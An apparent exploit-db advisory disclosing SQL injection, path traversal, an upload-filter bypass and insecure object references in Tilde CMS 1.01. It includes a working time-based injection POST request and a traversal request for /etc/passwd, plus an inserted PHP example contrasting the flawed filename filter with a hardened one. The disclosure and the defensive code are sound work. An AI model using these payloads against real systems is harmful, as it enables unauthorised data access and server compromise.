Tilde CMS 1.01 – Multiple Vulnerabilities

  • Author: Raffaele Forte
    Date: 2017-07-20
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/42348/

    # Exploit Title: Tilde CMS 1.01 Multiple Vulnerabilities
    # Date: July 7th, 2017
    # Exploit Authors: Paolo Forte, Raffaele Forte <raffaele@backbox.org>
    # Vendor Homepage: http://www.tildenetwork.com/
    # Version: Tilde CMS 1.0.1
    # Tested on: Ubuntu 12.04, PHP 5.3.10
    
    
    I. INTRODUCTION
    ========================================================================
    Tilde CMS is a closed-source content management system created by
    tildenetwork.com
    
    
    II. DESCRIPTION
    ========================================================================
    The web application suffers from multiple vulnerabilities.
    
    1. SQL Injection
    ------------------------------------------------------------------------
    Due to missing escaping of the backtick character, the following query in 
    the source code is vulnerable:
    
    [class.SystemAction.php]
    
    	$SQL_string = "SELECT * FROM `form_table_".$id_form."` WHERE ID='$idForm'";
    	$SQL_oldData = @mysql_query($SQL_string,$this->DB_conn);
    
    The vulnerability can be triggered via a POST request, as shown in the
    following PoC:
    
    	POST /actionphp/action.input.php HTTP/1.1
    
    	ActionForm=SendForm&TotalQuery=653&TotalCompiled=2&id=1` WHERE 
    	SLEEP(5)-- aaa &idForm=1234567890
    
    The resulting query on the server-side will be:
    	SELECT * FROM `form_table_1` WHERE SLEEP(5)-- aaa ` WHERE ID='1234567890'
    
    For successful exploitation, the table "form_table_1" must exist.
    
    
    2. Path Traversal
    ------------------------------------------------------------------------
    The vulnerability exists in this endpoint:
    
    	GET /actionphp/download.File.php?&file=../../../../../../etc/passwd
    
    
    3. Arbitrary Files Upload
    ------------------------------------------------------------------------
    It is possible to bypass the implemented restrictions shown in the 
    following snippet of the code:
    
    	$file=$_FILES['file'.$i]['tmp_name'];
    	if (($file!="")&&($file!="none")) {
    		$source_file=$file;
    		$file_name=$_FILES['file'.$i]['name'];
    		$file_name=str_replace(".php",".txt",$file_name);
    		$file_name=str_replace(" ","_",$file_name);
    		$file_name=str_replace("+","",$file_name);
    
    A file named "filename.+php" will be renamed to "filename.php" and is
    therefore uploaded successfully.
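    To make the failure of this filter concrete, the following is an added example, not code from the advisory or from Tilde CMS: the quoted str_replace() chain wrapped in a function, beside a hardened version that decides on the final name against an extension allow-list. The allowed-extension list and the sample filenames are constructed for illustration.

```php
<?php
// Added example (not Tilde CMS code). Reproduces the filename filter quoted
// in section 3 of the advisory, so its behaviour can be observed directly.
function advisory_filter_name(string $name): string {
    $name = str_replace(".php", ".txt", $name); // runs before "+" is stripped
    $name = str_replace(" ", "_", $name);
    $name = str_replace("+", "", $name);        // ".+php" now becomes ".php"
    return $name;
}

// Hardened replacement: normalise first, then validate the *final* name.
// $allowed is a constructed allow-list; tailor it to what the site needs.
function safe_upload_name(string $name, array $allowed = ['jpg', 'jpeg', 'png', 'gif', 'pdf']): ?string {
    $name = basename($name);                                // drop path parts
    $name = preg_replace('/[^A-Za-z0-9._-]/', '_', $name);  // allow-list chars
    $ext  = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    // Require exactly one dot: rejects "x.php.jpg"-style double extensions.
    if ($ext === '' || substr_count($name, '.') !== 1 || !in_array($ext, $allowed, true)) {
        return null;                                        // reject upload
    }
    return $name;
}

// Constructed sample names, including the bypass described in the advisory.
$samples = ['report.pdf', 'filename.+php', 'shell.php', 'shell.php.jpg', 'photo.PNG'];
foreach ($samples as $n) {
    printf("%-16s filter=%-16s hardened=%s\n",
        $n, advisory_filter_name($n), safe_upload_name($n) ?? 'REJECTED');
}
```

    Running it shows "filename.+php" passing the original chain as "filename.php" while the hardened function rejects it, along with the plain and double-extension PHP names.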
    
    
    4. Insecure Direct Object References
    ------------------------------------------------------------------------
    It is possible to retrieve sensitive resources by using direct references.
    A low privileged user can load the PHP resources such as: 
    
    	admin/content.php
    	admin/content.php?method=ftp_upload
    
    
    IV. BUSINESS IMPACT
    ========================================================================
    These flaws may compromise the integrity of the system and/or expose 
    sensitive information.
    
    
    V. SYSTEMS AFFECTED
    ========================================================================
    Tilde CMS 1.01 is vulnerable (and probably all previous versions).
    
    
    VI. VULNERABILITY HISTORY
    ========================================================================
    July 6th, 2017: Vulnerability identification
    July 7th, 2017: Vendor notification
    July 13th, 2017: Vendor notification
    
    
    VII. LEGAL NOTICES
    ========================================================================
    The information contained within this advisory is supplied "as-is" with
    no warranties or guarantees of fitness of use or otherwise. We accept no
    responsibility for any damage caused by the use or misuse of this
    information.